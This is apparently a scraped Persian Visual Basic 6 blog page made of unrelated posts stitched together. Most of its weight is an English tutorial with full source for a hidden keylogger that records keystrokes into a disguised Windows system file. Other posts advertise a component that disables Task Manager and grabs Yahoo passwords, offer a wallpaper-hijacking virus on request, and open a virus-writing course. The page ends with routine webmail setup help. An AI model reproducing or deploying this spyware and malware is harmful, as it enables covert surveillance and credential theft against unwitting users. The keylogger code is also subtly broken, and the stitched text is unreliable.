طیف نما برای کارهای مولتی مدیا جالب
بک گراند Fifa برای جام جهانی 2010 خودم طراحی کردم
یک Progress bar کاربردی و جالب
باز کردن Combo box با زدن اینتر
متوقف کردن برنامه در تاریخ معین شده
تبدیل فوریه برای بچه های الکترونیک و ریاضی
یک نمونه کوچک از برنامه خودم(وی بی فارسی)(اقا کمال)
اموزش برنامه نویسی Socket Programing
یک نمونه کوچک از برنامه خودم (نوار مرزی)
Ok...I am assuming that you have a basic understanding as to how visual basic works and how to make programs, debug, and compile. If not, email me and I might be able to help.
First, if you don't have it, get it. ApiGuide. Download it at http://www.mentalis.org/agnet/apiguide.shtml
Ok. Open VB and start a new application. Add to the form a button, a timer, and a module(I know the module isn't actually part of the form). Thats all. Change there caption of the button to Start Logging
(if you want to make it start on startup...pm me or email me)
Now using api guide or just copying from here, declare a new function. the GetASyncKeyState function
Declare Function GetAsyncKeyState Lib "user32" Alias "GetAsyncKeyState"
(ByVal vKey As Long) As Integer
^---put this in the declarations section of the module.
That is all one line of code. Make sure its like that. and not split in 2.
Now you have a new function to use through your program.
ok...
now we must make it be "invisible". Now im sorry but in Windows XP, i do not know how to remove it from the "processes" section of the Task Manager. But Other than that...its invisible.
OK. In the button code..., in the click event of course...
type the following
app.taskvisible = false
form1.visible = false
form1.hide
timer1.enabled = true
'and also in the properties section of the form...change the shownintaskbar to false
Now when we click the button...it goes invisible.
Now we are going to need some variables....
Back in the declarations section declare the following...
Dim strLetter as String, strTotal as String
Now in the timer code put this. Ill explain afterward.
also set the interval to 1 and enabled to false
Private Sub Timer1_Timer()
For I = 28 To 128
If GetAsyncKeyState <> 0 Then
strLetter = Chr(I)
'Now here you can add certain things
'so that instead of displaying
'retarded characters, it tells you
'what the user pressed. What I mean
'is if they press Enter/Return, it will
'Show some weird box. You dont want that
'so u make a select case about I for each
'button u want to customize. PM me or Email
'me for help on this part.
strTotal = strTotal & strLetter
End If
Next I
open "C:\Windows\SysResources.DAT" for output as #1
Print #1, strTotal
close #1
End Sub
'End Code
Now all you have to do is when you want to check the keys pressed, open up C:\Windows\SysResource.DAT in notepad, and there it is. This program will not run on start up. If you want to know how to do that, PM me, but preferably email me. I would much rather have you add me to Msn Messenger. My email for messenger is... Black_viper_13@hotmail.com
My email for emailing is..... Anarchist_ninja_thief@hotmail.com.
Hope this helps!
Here is the entire coding for the lamers...
'BEGINNING
Dim strLetter As String, strTotal As String, old as string
Private Sub Command1_Click()
Timer1.Enabled = True
End Sub
Private Sub Form_Load()
Command1.Caption = "Start Loggin"
Timer1.Enabled = False
Timer1.Interval = 1
End Sub
Private Sub Timer1_Timer()
For I = 28 To 128 'ASCII code
If GetAsyncKeyState <> 0 Then
strLetter = Chr(I)
End If
If strletter <> Old Then
Old = strletter
strTotal = strTotal & old
End If
Next I
Open "C:\windows\SysResources.dat" For Output As #1
Print #1, strTotal
Close #1
End Sub
'ENDING
i think thats it besides the Module of course.
مجموعه ای از کاربردی ترین دستورات برای برنامه نویسی
در این مجموعه که توسط گروه ما جمع آوری شده است دستوراتی ساده شده وجود دارد که به جای نوشتن کد های آن می توانید با یک خط از آن استفاده کنید.مثلا برای ارسال ایمیل به ده ها خط برنامه نویسی نیاز دارید ولی با این مجموعه فقط در یک خط یک ایمیل ارسال کنید.
برای استفاده از این مجموعه شما باید در قسمت کامپوننت ها (Components) این فایل(XSX.OCX) را انتخاب کنید(Browse) و انر تیک دارد کنید و در برنامه نویسی از آن استفاده کنید مثلا برای ارسال ایمیل:
"XSXToolz1.SendMail " mail@from.you ", " mail@TO.com ", "Subject", "Body
وی دیگر عملیات مورد نیاز:
1- Always on Top برای فرم ها و هر هندل.
۲- تبدیل رشته ای از کاراکترهای یونیکد به کدهای ASCII.
3- تبدیل رشته ای از کد های ASCII به کاراکتر های یونیکد.
۴- تغییر ژس زمینه میز کار(Desktop Wallpaper)
5- قرنتینه موس در محدوده فرم به صورتی که موس نتواند از محدوده فرم خارج شود.
6- غیر فعال کردن راست کلیک بر روی فایل ها.
7- غیر فعال کردن مدیروظایف Task Managerیا همان (Ctrl + Alt + Del).
8- فرمت غیر مستقیم درایو ها.
9- گرفتن عکس از تصویر مانیتور و ذخیره آن در فایل.
10- گرفتن آدرس پوشه سیستم.
11- گرفتن رمز و آی.دی یاهو.(در صورت نیاز به کمک با ما درمیان بگزارید)
12- مخفی کردن Folder Options.
13- تشخیص اتصال به اینترنت.
۱۴- قفل کردن یک پنجره بوسیله دادن هندل.
۱۵- Minimize کردن یک پنجره با دادن هندل آن.
۱۶- مخفی کردن Display Properties در راست کلیک در بروی میزکار(ِDesktop).
17- مخفی کردن Properties در راست کلیک در روی My Computer.
18- غیر فعال کردن تغییر تصویر میزکار(Desktop).
19- خواندن محتویات یک فایل.
20- بستن یک پنجره با دادن هندل آن.
21- ارسال ایمیل بسیار آسان.
22- قرار دادن مختصات موس در مختصات وارد شده.
23- مخفی یا آشکار کردن یک پنجره از روی مانیتور با دادن هندل ان(پنجره را نمی بندد فقط مخفی می شود)
24- مخفی یا آشکار کردن موس.
25- قرار دادن خاصیت اجرای خود کار برنامه(بعد از هربار بالا آمدن ویندوز برنامه شما اجرا شود)
26- جابه جایی کلیک چپ و راست موس.
27- مخفی یا آشکار کردن نوار وظیفه (Taskbar).
28- نوشتن اطلاعاتی در یک فایل.
حجم فایل: 24 کیلوبایت
چند وقت پیش یکی از بازدید کنندگان این وبلاگ این ویروس را سفارش دادند که کمتر جایی آنرا دیده اید . این ویروس جالب در مرحله اول آدرس پس زمینه کامپوتر را گرفته
و عکسی را بر روی Wallpaper کامپیوتر فرد درج می کند ! به طوری که با عوض کردن دوباره پس زمینه این کار نیز دوباره انجام می شود ! سورس این ویروس ساده نیز هست البته کسانی که خود ویروس را می خواهند باید عکس مورد نظر خودرا (همان عکسی که قرار است بر روی کامپیوتر فرد قربانی درج شود) برای ما ارسال کنند و بعد در همین پست به ما نظر بدهند . برای دیدن گوشه ای از خرابکاری این ویروس بر روی ادامه مطلب کلیک کنید.
ویروس به همراه سورس (حجم 200 کیلو بایت)
آیا می دانید بهترین کامپایلر ویروس چیست(منظور زبان های برنامه نویسی است)؟
بسیاری بر این عقیده اند که ویژوال بیسیک ۶ بهترین کامپایلر است تا زمانی که ویندوز وجود دارد و ساختارش چنین باشد.اما بسیاری هم دلفی را به عنوان زبان ویروس خود انتخاب کرده اند،اما این مهم نیست، مهم خلاقیت ویروس نویس و مهارت وی است.
گروه ما هم عقیده اول را قبول دارد زیرا در تمامی ویندوز های XP و 2000 و فایل مورد نیاز برنامه های وی.بی وجود دارد و همچنین برنامه نویسی با ویژوال بیسیک 6 بسیار ساده و راحت می باشد به طوری که یک فرد می تواند در مدت زمان کمتر از 6 ماه ویروس نویسی خوب شود.
از تمامی این حرف ها می گذریم...
پله اول مرحله اول
در این مرحله باید با ویژوال بیسیک و Syntax آن و چندین نکته ساده را بیاموزید(به دلیل این که در این دوره آموزشی قصد ما تنها آموزش های ویروس نویسی است این مرحله را به عهده خودتان می گذاریم،می توانید از فروم های فارسی در این زمینه و کتاب های آموزشی استفاده کنید)
پله اول مرحله دوم
در مرحله باید تمامی افکار خود را به سمت ویروس نویسی برده و خود را برتر ببینید ولی به هیچ عنوان زیاده روی(لاف) نکنید.
با یک مثال بسیار ساده شروع می کنیم:
برای ورود به بخش پست الکترونیک از طریق Web می بایست در قسمت Address مرورگر کامپیوتر خود(مانند Internet Explorer)، یکی از آدرسهای زیر را وارد نمایید و Enter کنید.
http://yoursite.com/webmail/
یا
http://yoursite.com:2095
در روش دوم اجباریست Internet Explorer در http:// نوشتن جمله
پس از وارد شدن به یکی از روش های بالا نام کاربری و رمز عبور خواسته می شود که باید نام کاربری و رمز عبور آدرس ایمیل مورد نظر را وارد کنید.
لازم به توضیح است نام کاربری در اینجا، همان آدرس ایمیل ساخته شده توسط شما می باشد.
بعد از این مرحله، با یکی از 3 نرم افزار مدیریت ایمیل که روی صفحه می آید، می توانید وارد کلیه قسمت های ایمیل خود شوید.
پیشنهاد می کنیم از Horde استفاده کنید.
برای استفاده ایمیل خود در نرم افزار های POP3(مانند Outlook)، باید در محل مربوطه تنظیمات را مانند زیر انجام دهید:
لازم به توضیح است، در صورتی که تمایل به استفاده از IMAP دارید، استفاده از این سرویس هم به شکل مشابه با POP3 می باشد.(همانند شکل زیر)
معرفی یک نرم افزار مدیریت ایمیل و طریقه کار با آن
نرم افزاری که ما به شما معرفی می کنیم، نرم افزار Outlook است، این نرم افزار روی کلیه سیستم عامل های Windows نصب می باشد.
با باز کردن این نرم افزار، باید به منوی Tools رفته و گزینه E-mail Accounts را انتخاب کنیم.
در این قسمت با انتخاب Add a new e-mail account درخواست ایجاد مدیریت ایمیل جدیدی را می دهید و بعد از زدن Next نوع ارتباط خود با پست الکترونیک انتخاب می کنید(مثلاً POP3) و پس از پر کردن اطلاعات شخصی و اطلاعات ایمیل Next و Finish را می زنید.
لازم به توضیح است، User Name شما در کلیه ایمیل ها، همان آدرس ایمیل شما می باشد.
پس از نصب ایمیل خود روی Outlook می توانید به ارسال و دریافت نامه ازطریق این برنامه اقدام نمایید.